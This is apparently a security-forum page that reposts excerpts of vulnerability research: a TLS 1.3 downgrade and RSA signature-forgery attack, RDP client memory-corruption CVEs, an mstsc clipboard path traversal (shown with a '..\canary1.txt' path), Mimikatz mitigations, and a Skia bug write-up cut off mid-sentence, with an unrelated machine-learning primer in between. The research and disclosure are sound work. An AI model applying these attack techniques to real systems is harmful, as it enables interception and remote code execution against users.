version of TLS with a cipher suite supporting an RSA key exchange. While TLS 1.3 does not use the RSA encryption algorithm for its key exchanges, it does use the signature algorithm of RSA for it; if the server’s certificate contains an RSA public key, it will be used to sign its ephemeral public keys during the handshake. A TLS 1.3 client can advertise which RSA signature algorithm it wants to support (if any) between RSA and RSA-PSS. As most TLS 1.2 servers already provide support for RSA , most will re-use their certificates instead of updating to the more recent RSA-PSS. RSA digital signatures specified per the standard are really close to the RSA encryption algorithm specified by the same document, so close that Bleichenbacher’s decryption attack on RSA encryption also works to forge RSA signatures. Intuitivelly, we have pmse and the decryption attack allows us to find (pmse)d = pms, for forging signatures we can pretend that the content to be signed tbs (see RFC 8446) is tbs = pmse and obtain tbsd via the attack, which is by definition the signature over the message tbs. However, this signature forgery requires an additional step (blinding) in the conventional Bleichenbacher attack. In practice this can lead to hundreds of thousands of additional messages. The TLS 1.3 signature forgery attack using a TLS 1.2 server as Bleichenbacher oracle. Key-Reuse has been shown in the past to allow for complex cross-protocol attacks on TLS. Indeed, we can successfully forge our own signature of the handshake transcript (contained in the CertificateVerify message) by negotiating a previous version of TLS with the same server. The attack can be carried if this new connection exposes a length or bleichenbacher oracle with a certificate using the same RSA key but for key exchanges. Downgrading to TLS 1.2 Every TLS connection starts with a negotiation of the TLS version and other connection attributes. As the new version of TLS (1.3) does not offer an RSA key exchange, the exploitation of our attack must first begin with a downgrade to an older version of TLS. TLS 1.3 being relatively recent (August 2018), most servers supporting it will also support older versions of TLS (which all provide support for RSA key exchanges). A server not supporting TLS 1.3 would thus respond with an older TLS version’s (TLS 1.2 in our example) serverHello message. To downgrade a client’s connection attempt, we can simply spoof this answer from the server. Besides protocol downgrades, other techniques exist to force browser clients to fallback onto older TLS versions: network glitches, a spoofed TCP RST packet, a lack of response, etc. (see POODLE) The TLS 1.3 attack downgrades the victim to an older version of TLS. Continuing with a spoofed TLS 1.2 handshake, we can simply present the server’s RSA certificate in a ServerCertificate message and then end the handshake with a ServerHelloDone message. At this point, if the server does not have a trusted certificate allowing for RSA key exchanges, or if the client refuse to support RSA key exchanges or older versions than TLS 1.2, the attack is stopped. Otherwise, the client uses the RSA public key contained in the certificate to encrypt the TLS premaster secret, sends it in a ClientKeyExchange message and ends its part of the handshake with a ChangeCipherSpec and a Finished messages. The Decryption Attack performs a new handshake with the server, using a modified encrypted premaster secret obtained from the victim’s ChangeCipherSpec message. At this point, we need to perform our attack in order to decrypt the RSA encrypted premaster secret. The last Finished message that we send must contains an authentication tag (with HMAC) of the whole transcript, in addition of being encrypted with the transport keys derived from the premaster secret. While some clients will have no handshake timeouts, most serious applications like browsers will give up on the connection attempt if our response takes too much time to arrive. While the attack only takes a few thousand messages, this might still be too much in practice. Fortunately, several techniques exist to slow down the handshake: we can send the ChangeCipherSpec message which might reset the client’s timer we can send TLS warning alerts to reset the handshake timer Once the decryption attack terminates, we can send the expected Finished message to the client and finalize the handshake. From there everything is possible, from passively relaying and observing messages to the impersonated server through to actively tampering requests made to it. This downgrade attack bypasses multiple downgrade mitigations: one server-side and two client-side. TLS 1.3 servers that negotiate older versions of TLS must advertise this information to their peers. This is done by setting a quarter of the bytes from the server_random field in the ServerHello message to a known value. TLS 1.3 clients that end up negotiating an older version of TLS must check for these values and abort the handshake if found. But as noted by the RFC, “It does not provide downgrade protection when static RSA is used.” – Since we alter this value to remove the warning bytes, the client has no opportunity to detect our attack. On the other hand, a TLS 1.3 client that ends up falling back to an older version of TLS must advertise this information in their subsequent client hellos, since we impersonate the server we can simply ignore this warning. Furthermore, a client also includes the version used by the client hello inside of the encrypted premaster secret. For the same reason as previously, this mitigation has no effect on our attack. As it stands, RSA is the only known downgrade attack on TLS 1.3, which we are the first to successfuly exploit in this research. Attacking TLS 1.2 As with the previous attack, both the client and the server targetted need to support RSA key exchanges. As this is a typical key exchange most known browsers and servers support them, although they will often prefer to negotiate a forward secret key exchange based on ephemeral versions of the Elliptic Curve or Finite Field Diffie-Hellman key exchanges. This is done as part of the cipher suite negotiation during the first two handshake messages. To avoid this outcome, the ClientHello message can be intercepted and modified to strip it out of any non-RSA key exchanges advertised. The server will then only choose from a set of RSA-key-exchange-based cipher suites which will allow us to perform the same attack as previously discussed. Our modification of the ClientHello message can only be detected with the Finished message authenticating the correct handshake transcript, but since we are in control of this message we can forge the expected tag. The attack on TLS 1.2 modifies the client’s first packet to force an RSA key exchange. On the other side, if both peers end up negotiating an RSA key exchange on their own, we can passively observe the connection and take our time to break the session. Take Aways For each vulnerability discovered, there are three pieces of articles you can read: the first paper, the best explanation on the subject, and finally the last paper. We're hoping to be the last paper. The last 20 years of attacks that have been re-discovering Bleichenbacher's seminal work in 1998 clearly show that it is close to impossible to correclty implement the RSA PKCS#1 v1.5 encryption scheme. While our paper recommends a series of mitigations, it is time for RSA PKCS#1 v1.5 to be deprecated and replaced by more modern schemes like OAEP and ECEIS for asymmetric encryption or Elliptic Curve Diffie-Hellman for key exchanges. Finally, we note that keyless implementations of TLS are attractive targets, but are most often closed source and thus were not analyzed in this work. Published date: 07 February 2019 Written by: David Wong Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/february/downgrade-attack-on-tls-1.3-and-vulnerabilities-in-major-tls-libraries/
-
- 1
-
-
Machine Learning for Everyone In simple words. With real-world examples. Yes, again 21 november 2018 :: 28834 views :: 8137 words This article in other languages: Russian (original) Special thanks for help: @wcarss, @sudodoki and my wife ❤️ Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn’t even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future. I decided to write a post I’ve been wishing existed for a long time. A simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One and for everyone. Whether you are a programmer or a manager. Let's roll. Why do we want machines to learn? This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year old are $18,000 and so on. Billy, our brilliant analytic, starts seeing a pattern: so, the car price depends on its age and drops $1,000 every year, but won't get lower than $10,000. In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time, when trying to estimate a reasonable cost for a used iPhone on eBay or figure out how many ribs to buy for a BBQ party. 200 grams per person? 500? Yeah, it would be nice to have a simple formula for every problem in the world. Especially, for a BBQ party. Unfortunately, it's impossible. Let's get back to cars. The problem is, they have different manufacturing dates, dozens of options, technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me too. People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here. Let's provide the machine some data and ask it to find all hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind. That was the birth of machine learning. Articol complet: https://vas3k.com/blog/machine_learning/
-
- 2
-
-
-
Reverse RDP Attack: Code Execution on RDP Clients February 5, 2019 Research by: Eyal Itkin Overview Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help those working remotely or to work in a safe VM environment, RDP clients are an invaluable tool. However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security researcher’s computer. Such an infection could then allow for an intrusion into the IT network as a whole. 16 major vulnerabilities and a total of 25 security vulnerabilities were found overall. The full list can be found in Appendix A & B. Introduction The Remote Desktop Protocol (RDP), also known as “mstsc” after the Microsoft built-in RDP client, is commonly used by technical users and IT staff to connect to / work on a remote computer. RDP is a proprietary protocol developed by Microsoft and is usually used when a user wants to connect to a remote Windows machine. There are also some popular open-source clients for the RDP protocol that are used mainly by Linux and Mac users. RDP offers many complex features, such as: compressed video streaming, clipboard sharing, and several encryption layers. We therefore decided to look for vulnerabilities in the protocol and its popular implementations. In a normal scenario, you use an RDP client, and connect to a remote RDP server that is installed on the remote computer. After a successful connection, you now have access to and control of the remote computer, according to the permissions of your user. But if the scenario could be put in reverse? We wanted to investigate if the RDP server can attack and gain control over the computer of the connected RDP client. Figure 1: Attack scenario for the RDP protocol There are several common scenarios in which an attacker can gain elevated network permissions by deploying such an attack, thus advancing his lateral movement inside an organization: Attacking an IT member that connects to an infected work station inside the corporate network, thus gaining higher permission levels and greater access to the network systems. Attacking a malware researcher that connects to a remote sandboxed virtual machine that contains a tested malware. This allows the malware to escape the sandbox and infiltrate the corporate network. Now that we decided on our attack vector, it is time to introduce our targets, the most commonly used RDP clients: mstsc.exe – Microsoft’s built-in RDP client. FreeRDP – The most popular and mature open-source RDP client on Github. rdesktop – Older open-source RDP client, comes by default in Kali-linux distros. Fun fact: As “rdesktop” is the built-in client in Kali-linux, a Linux distro used by red teams for penetration testing, we thought of a 3rd (though probably not practical) attack scenario: Blue teams can install organizational honeypots and attack red teams that try to connect to them through the RDP protocol. Open-Source RDP clients As is usually the case, we decided to start looking for vulnerabilities in the open source clients. It seems that it will only make sense to start reverse engineer Microsoft’s client after we will have a firm understanding of the protocol. In addition, if we find common vulnerabilities in the two open sourced clients, we could check if they also apply to Microsoft’s client. In a recon check it looked like “rdesktop” is smaller than “FreeRDP” (has fewer lines of code), and so we selected it as our first target. Note: We decided to perform an old-fashioned manual code audit instead of using any fuzzing technique. The main reasons for this decision were the overhead of writing a dedicated fuzzer for the complex RDP protocol, together with the fact that using AFL for a protocol with several compression and encryption layers didn’t look like a good idea. rdesktop Tested version: v1.8.3 After a short period, it looked like the decision to manually search for vulnerabilities paid off. We soon found several vulnerable patterns in the code, making it easier to “feel” the code, and pinpoint the locations of possible vulnerabilities. We found 11 vulnerabilities with a major security impact, and 19 vulnerabilities overall in the library. For the full list of CVEs for “rdesktop”, see Appendix A. Note: An additional recon showed that the xrdp open-source RDP server is based on the code of “rdesktop”. Based on our findings, it appears that similar vulnerabilities can be found in “xrdp” as well. Instead of a technical analysis of all of the CVEs, we will focus on two common vulnerable code patterns that we found. Remote Code Executions – CVEs 2018-20179 – 2018-20181 Throughout the code of the client, there is an assumption that the server sent enough bytes to the client to process. One example for this assumption can be found in the following code snippet in Figure 2: Figure 2: Parsing 2 fields from stream “s” without first checking its size As we can see, the fields “length” and “flags” are parsed from the stream “s”, without checking that “s” indeed contains the required 8 bytes for this parsing operation. While this usually only leads to an Out-Of-Bounds read, we can combine this vulnerability with an additional vulnerability in several of the inner channels and achieve a much more severe effect. There are three logical channels that share a common vulnerability: lspci rdpsnddbg – yes, this debug channel is always active seamless The vulnerability itself can be seen in Figure 3: Figure 3: Integer-Underflow when calculating the remaining “pkglen” By reading too much data from the stream, i.e. sending a chopped packet to the client, the invariant that “s->p <= s->end” breaks. This leads to an Integer-Underflow when calculating “pkglen”, and to an additional Integer-Overflow when allocating “xmalloc(pkglen + 1)” bytes for our buffer, as can be seen in my comment above the call to “xmalloc”. Together with the proprietary implementation of “STRNCPY”, seen in Figure 4, we can trigger a massive heap-based buffer overflow when copying data to the tiny allocated heap buffer. Figure 4: proprietary implementation of the “strncpy” function By chaining together these two vulnerabilities, found in three different logical channels, we now have three remote code execution vulnerabilities. CVE 2018-8795 – Remote Code Execution Another classic vulnerability is an Integer-Overflow when processing the received bitmap (screen content) updates, as can be seen in Figure 5: Figure 5: Integer-Overflow when processing bitmap updates Although “width” and “height” are only 16 bits each, by multiplying them together with “Bpp” (bits-per-pixel), we can trigger an Integer-Overflow. Later on, the bitmap decompression will process our input and break on any decompression error, giving us a controllable heap-based buffer-overflow. Note: This tricky calculation can be found in several places throughout the code of “rdesktop”, so we marked it as a potential vulnerability to check for in “FreeRDP”. FreeRDP Tested version: 2.0.0-rc3 After finding multiple vulnerabilities in “rdesktop”, we approached “FreeRDP” with some trepidation; perhaps only “rdesktop” had vulnerabilities when implementing RDP? We still can’t be sure that every implementation of the protocol will be vulnerable. And indeed, at first glance, the code seemed much better: there are minimal size checks before parsing data from the received packet, and the code “feels” more mature. It is going to be a challenge. However, after a deeper examination, we started to find cracks in the code, and eventually we found critical vulnerabilities in this client as well. We found 5 vulnerabilities with major security impact, and 6 vulnerabilities overall in the library. For the full list of CVEs for “FreeRDP”, see Appendix B. Note: An additional recon showed that the RDP client NeutrinoRDP is a fork of an older version (1.0.1) of “FreeRDP” and therefore probably suffers from the same vulnerabilities. At the end of our research, we developed a PoC exploit for CVE 2018-8786, as can be seen in this video: CVE 2018-8787 – Same Integer-Overflow As we saw earlier in “rdesktop”, calculating the dimensions of a received bitmap update is susceptible to Integer-Overflows. And indeed, “FreeRDP” shares the same vulnerability: Figure 6: Same Integer-Overflow when processing bitmap updates Remote Code Execution – CVE 2018-8786 Figure 7: Integer-Truncation when processing bitmap updates As can be seen in Figure 7, there is an Integer-Truncation when trying to calculate the required capacity for the bitmap updates array. Later on, rectangle structs will be parsed from our packet and into the memory of the too-small allocated buffer. This specific vulnerability is followed by a controlled amount (“bitmapUpdate->number”) of heap allocations (with a controlled size) when the rectangles are parsed and stored to the array, granting the attacker a great heap-shaping primitive. The downside of this vulnerability is that most of the rectangle fields are only 16 bits wide, and are upcasted to 32 bits to be stored in the array. Despite this, we managed to exploit this CVE in our PoC. Even this partially controlled heap-based buffer-overflow is enough for a remote code execution. Mstsc.exe – Microsoft’s RDP client Tested version: Build 18252.rs_prerelease.180928-1410 After we finished checking the open source implementations, we felt that we had a pretty good understanding of the protocol and can now start to reverse engineer Microsoft’s RDP client. But first thing first, we need to find which binaries contain the logic we want to examine. The *.dll files and *.exe files we chose to focus on: rdpbase.dll – Protocol layer for the RDP client. rdpserverbase.dll – Protocol layer for the RDP server. rdpcore.dll / rdpcorets.dll – Core logic for the RDP engine. rdpclip.exe – An .exe we found and that we will introduce later on. mstscax.dll – Mostly the same RDP logic, used by mstsc.exe. Testing prior vulnerabilities We started by testing our PoCs for the vulnerabilities in the open-source clients. Unfortunately, all of them caused the client to close itself cleanly, without any crash. Having no more excuses, we opened IDA and started to track the flow of the messages. Soon enough, we realized that Microsoft’s implementation is much better than the implementations we tested previously. Actually, it seems like Microsoft’s code is better by several orders of magnitude, as it contains: Several optimization layers for efficient network streaming of the received video. Robust input checks. Robust decompression checks, to guarantee that no byte will be written past the destination buffer. Additional supported clipboard features. … Needless to say, there were checks for Integer-Overflows when processing bitmap updates. Wait a minute, they share a clipboard? When we checked “rdesktop” and “FreeRDP”, we found several vulnerabilities in the clipboard sharing channel (every logical data layer is called a channel). However, at the time, we didn’t pay much attention to it because they only shared two formats: raw text and Unicode text. This time it seems that Microsoft supports several more shared data formats, as the switch table we saw was much bigger than before. After reading more about the different formats in MSDN, one format immediately attracted our attention: “CF_HDROP”. This format seems responsible for “Drag & Drop” (hence the name HDROP), and in our case, the “Copy & Paste” feature. It’s possible to simply copy a group of files from the first computer, and paste them in the second computer. For example, a malware researcher might want to copy the output log of his script from the remote VM to his desktop. It was roughly at this point, while I was trying to figure out the flow of the data, Omer (@GullOmer) asked me if and where PathCanonicalizeA is called. If the client fails to properly canonicalize and sanitize the file paths it receives, it could be vulnerable to a path-traversal attack, allowing the server to drop arbitrary files in arbitrary paths on the client’s computer, a very strong attack primitive. After failing to find imports for the canonicalization function, we dug in deeper, trying to figure out the overall architecture for this data flow. Figure 8 summarizes our findings: Figure 8: Architecture of the clipboard sharing in Microsoft’s RDP This is where rdpclip.exe comes into play. It turns out that the server accesses the clipboard through a broker, and that is rdpclip.exe. In fact, rdpclip.exe is just a normal process (we can kill / spawn it ourselves) that talks to the RDP service using a dedicated virtual channel API. At this stage, we installed ClipSpy, and started to dynamically debug the clipboard’s data handling that is done inside rdpclip.exe. These are our conclusions regarding the data flow in an ordinary “Copy & Paste” operation in which a file is copied from the server to the client: On the server, the “copy” operation creates a clipboard data of the format “CF_HDROP”. When the “paste” is performed in the client’s computer, a chain of events is triggered. The rdpclip.exe process on the server is asked for the clipboard’s content, and converts it to a FileGroupDescriptor (Fgd) clipboard format. The metadata of the files is added to the descriptor one at a time, using the HdropToFgdConverter::AddItemToFgd() function. After it is finished, the Fgd blob is sent to the RDP service on the server. The server simply wraps it and sends it to the client. The client unwraps it and stores it in its own clipboard. A “paste” event is sent to the process of the focused window (for example, explorer.exe). This process handles the event and reads the data from the clipboard. The content of the files is received over the RDP connection itself. Path Traversal over the shared RDP clipboard If we look back on the steps performed on the received clipboard data, we notice that the client doesn’t verify the received Fgd blob that came from the RDP server. And indeed, if we modify the server to include a path traversal path of the form: ..\canary1.txt, ClipSpy shows us (see Figure 9) that it was stored “as is” on the client’s clipboard: Figure 9: Fgd with a path-traversal was stored on the client’s clipboard In Figure 10, we can see how explorer.exe treats a path traversal of ..\filename.txt: Figure 10: Fgd with a path-traversal as explorer.exe handles it Just to make sure, after the “paste” in folder “Inner”, the file is stored to “Base” instead: Figure 11: Folders after a successful path traversal attack And that’s practically it. If a client uses the “Copy & Paste” feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files to arbitrary file locations on the client’s computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client’s “Startup” folder, and after a reboot they will be executed on his computer, giving us full control. Note: In our exploit, we simply killed rdpclip.exe, and spawned our own process to perform the path traversal attack by adding additional malicious file to every “Copy & Paste” operation. The attack was performed with “user” permissions, and does not require the attacker to have “system” or any other elevated permission. Here is a video of our PoC exploit: Taking it one step further Every time a clipboard is updated on either side of the RDP connection, a CLIPRDR_FORMAT_LIST message is sent to the other side, to notify it about the new clipboard formats that are now available. We can think of it as a complete sync between the clipboards of both parties (except for a small set of formats that are treated differently by the RDP connection itself). This means that our malicious server is notified whenever the client copies something to his “local” clipboard, and it can now query the values and read them. In addition, the server can notify the client about a clipboard “update” without the need for a “copy” operation inside the RDP window, thus completely controlling the client’s clipboard without being noticed. Scenario #1: A malicious RDP server can eavesdrop on the client’s clipboard – this is a feature, not a bug. For example, the client locally copies an admin password, and now the server has it too. Scenario #2: A malicious RDP server can modify any clipboard content used by the client, even if the client does not issue a “copy” operation inside the RDP window. If you click “paste” when an RDP connection is open, you are vulnerable to this kind of attack. For example, if you copy a file on your computer, the server can modify your (executable?) file / piggy-back your copy to add additional files / path-traversal files using the previously shown PoC. We were able to successfully test this attack scenario using NCC’s .NET deserialization PoC: The server executes their PoC, and positions in the clipboard a .NET content that will pop a calculator (using the “System.String” format). When the client clicks “paste” inside the PowerShell program, the deserialization occurs and a calc is popped. Note: The content of the synced clipboard is subject to Delayed Rendering. This means that the clipboard’s content is sent over the RDP connection only after a program actively asks for it, usually by clicking “paste”. Until then, the clipboard only holds the list of formats that are available, without holding the content itself. Disclosure Timeline 16 October 2018 – Vulnerability was disclosed to Microsoft. 22 October 2018 – Vulnerabilities were disclosed to FreeRDP. 22 October 2018 – FreeRDP replied and started working on a patch. 28 October 2018 – Vulnerabilities were disclosed to rdesktop. 5 November 2018 – FreeRDP sent us the patches and asked for us to verify them. 18 November 2018 – We verified the patches of FreeRDP, and gave them a “green light” to continue. 20 November 2018 – FreeRDP committed the patches to their Github as part of 2.0.0-rc4. 17 December 2018 – Microsoft acknowledged our findings. For more information, see Microsoft’s Response. 19 December 2018 – rdesktop sent us the patches and asked us to verify them. 19 December 2018 – We verified the patches of rdesktop, and gave them a “green light” to continue. 16 January 2019 – rdesktop committed the patches to their Github as part of v1.8.4. Microsoft’s Response During the responsible disclosure process, we sent the details of the path traversal in mstsc.exe to Microsoft. This is Microsoft’s official response: “Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).” As a result, this path traversal has no CVE-ID, and there is no patch to address it. Conclusion During our research, we found numerous critical vulnerabilities in the tested RDP clients. Although the code quality of the different clients varies, as can be seen by the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated, and is prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft’s client and one of the open-sourced clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution over the client’s computer. As RDP is regularly used by IT staff and technical workers to connect to remote computers, we highly recommend that everyone patch their RDP clients. In addition, due to the nature of the clipboard findings we showed in Microsoft’s RDP client, we recommend users to disable the clipboard sharing channel (on by default) when connecting to a remote machine. Recommendation for Protection Check Point recommends the following steps in order to protect against this attack: Check Point Research worked closely with FreeRDP, rdesktop and Microsoft to mitigate these vulnerabilities. If you are using rdesktop or FreeRDP, update to the latest version which includes the relevant patches. When using Microsoft RDP client (MSTSC), we strongly recommend disabling bi-directional clipboard sharing over RDP. Apply security measures to both the clients and the servers involved in the RDP communication. Check Point provides various security layers that may be used for protection such as IPS, SandBlast Agent, Threat Emulation and ANTEX. Users should avoid using RDP to connect to remote servers that have not implemented sufficient security measures. Check Point’s IPS blade provides protections against these threats: “FreeRDP Remote Code Execution (CVE-2018-8786)” Appendix A – CVEs found in rdesktop: CVE 2018-8791: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpdr_process() that results in an information leak. CVE 2018-8792: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function cssp_read_tsrequest() that results in a Denial of Service (segfault). CVE 2018-8793: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function cssp_read_tsrequest() that results in a memory corruption and probably even a remote code execution. CVE 2018-8794: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to an Out-Of-Bounds Write in function process_bitmap_updates() and results in a memory corruption and possibly even a remote code execution. CVE 2018-8795: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function process_bitmap_updates() and results in a memory corruption and probably even a remote code execution. CVE 2018-8796: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_bitmap_updates() that results in a Denial of Service (segfault). CVE 2018-8797: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function process_plane() that results in a memory corruption and probably even a remote code execution. CVE 2018-8798: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpsnd_process_ping() that results in an information leak. CVE 2018-8799: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_secondary_order() that results in a Denial of Service (segfault). CVE 2018-8800: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function ui_clip_handle_data() that results in a memory corruption and probably even a remote code execution. CVE 2018-20174: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function ui_clip_handle_data() that results in an information leak. CVE 2018-20175: rdesktop versions up to and including v1.8.3 contains several Integer Signedness errors that leads to Out-Of-Bounds Reads in file mcs.c and result in a Denial of Service (segfault). CVE 2018-20176: rdesktop versions up to and including v1.8.3 contains several Out-Of-Bounds Reads in file secure.c that result in a Denial of Service (segfault). CVE 2018-20177: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function rdp_in_unistr() and results in a memory corruption and possibly even a remote code execution. CVE 2018-20178: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_demand_active() that results in a Denial of Service (segfault). CVE 2018-20179: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function lspci_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20180: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function rdpsnddbg_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20181: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function seamless_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20182: rdesktop versions up to and including v1.8.3 contain a Buffer Overflow over the global variables in function seamless_process_line() that results in a memory corruption and probably even a remote code execution. Appendix B – CVEs found in FreeRDP: CVE 2018-8784: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress_segment() that results in a memory corruption and probably even a remote code execution. CVE 2018-8785: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress() that results in a memory corruption and probably even a remote code execution. CVE 2018-8786: FreeRDP prior to version 2.0.0-rc4 contains an Integer Truncation that leads to a Heap-Based Buffer Overflow in function update_read_bitmap_update() and results in a memory corruption and probably even a remote code execution. CVE 2018-8787: FreeRDP prior to version 2.0.0-rc4 contains an Integer Overflow that leads to a Heap-Based Buffer Overflow in function gdi_Bitmap_Decompress() and results in a memory corruption and probably even a remote code execution. CVE 2018-8788: FreeRDP prior to version 2.0.0-rc4 contains an Out-Of-Bounds Write of up to 4 bytes in function nsc_rle_decode() that results in a memory corruption and possibly even a remote code execution. CVE 2018-8789: FreeRDP prior to version 2.0.0-rc4 contains several Out-Of-Bounds Reads in the NTLM Authentication module that results in a Denial of Service (segfault). Sursa: https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
-
- 3
-
-
-
Mitigations against Mimikatz Style Attacks Published: 2019-02-05 Last Updated: 2019-02-05 15:26:32 UTC by Rob VandenBrink (Version: 1) If you are like me, at some point in most penetration tests you'll have a session on a Windows host, and you'll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process, or at least that's where it started - since it's original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" to attack other resources in the network - this is commonly called "lateral movement", though in many cases you're actually walking "up the tree" to ever-more-valuable targets in the infrastructure. The defender / blue-teamer (or the blue-team's manager) will often say "this sounds like malware, isnt't that what Antivirus is?". Sadly, this is half right - malware does use this style of attack. The Emotet strain of malware for instance does exactly this, once it gains credentials and persistence it often passes control to other malware (such as TrickBot or Ryuk). Also sadly, it's been pretty easy to bypass AV on this for some time now - there are a number of well-known bypasses that penetration testers use for the Mimikatz + AV combo, many of them outlined on the BHIS blog: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz But what about standard Windows mitigations against Mimikatz? Let's start from the beginnning, when Mimikatz first came out, Microsoft patched against that first version of code using KBKB2871997 (for Windows 7 era hosts, way back in 2014). Articol complet: https://isc.sans.edu/diary/rss/24612
-
- 2
-
-
-
Tuesday, February 5, 2019 The Curious Case of Convexity Confusion Posted by Ivan Fratric, Google Project Zero Intro Some time ago, I noticed a tweet about an externally reported vulnerability in Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons: Firstly, I looked at Skia before within the context of finding precision issues, and any bugs in the code I already looked at instantly evoke the “What did I miss?” question in my head. Secondly, the bug was described as a stack-based buffer overflow, and you don’t see many bugs of this type anymore, especially in web browsers. And finally, while the bug itself was found by fuzzing and didn’t contain much in the sense of root cause analysis, a part of the fix involved changing the floating point precision from single to double which is something I argued against in the previous blog post on precision issues in graphics libraries. So I wondered what the root cause was and if the patch really addressed it, or if other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer. Geometry for exploit writers To understand what the issue was, let’s quickly cover some geometry basics we’ll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section. A convex polygon is a polygon with a following property: you can take any two points inside the polygon, and if you connect them, the resulting line will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images: Image 1: An example of a convex polygon Image 2: An example of a concave polygon A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottom-most point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase) but never alternate directions. This is illustrated by the following examples: Image 3: An example of a y-monotone polygon Image 4: An example of a non-y-monotone polygon A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the inverse is not true: A monotone polygon can be concave, as illustrated in Image 3. All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely from line segments). A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that affine transformation also includes rotation because rotation can be expressed as a combination of scale and skew). Affine transformation has a property that, when it is used to transform a convex shape, the resulting shape must also be convex. For the readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices. For example, if you multiply a rotation matrix and a translation matrix, you’ll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either rotation or translation is going to be applied first. The bug Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia which can consist of both line and curve segments). The result of this was, after the RRect was converted to a path and transformed, the resulting shape didn’t look like a RRect at all - the resulting shape was concave. At the same time Skia assumes that every RRect must be convex and so, when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in a helper class SkAutoPathBoundsUpdate). Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here. Skia developers fixed the bug by addressing RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths and also made sure that any RRect corner with a tiny radius would be treated as if the radius is 0. Possibly (I haven’t checked), this makes sure that converting RRect to a path won’t result in a concave shape. However, another detail caught my attention: Initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn’t cause any issues when the path was rendered. At some point the path was transformed which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be? The answer: The transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform can not change its convexity, and so, when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object. This means: if we can convince Skia that a path is convex, when in reality it is 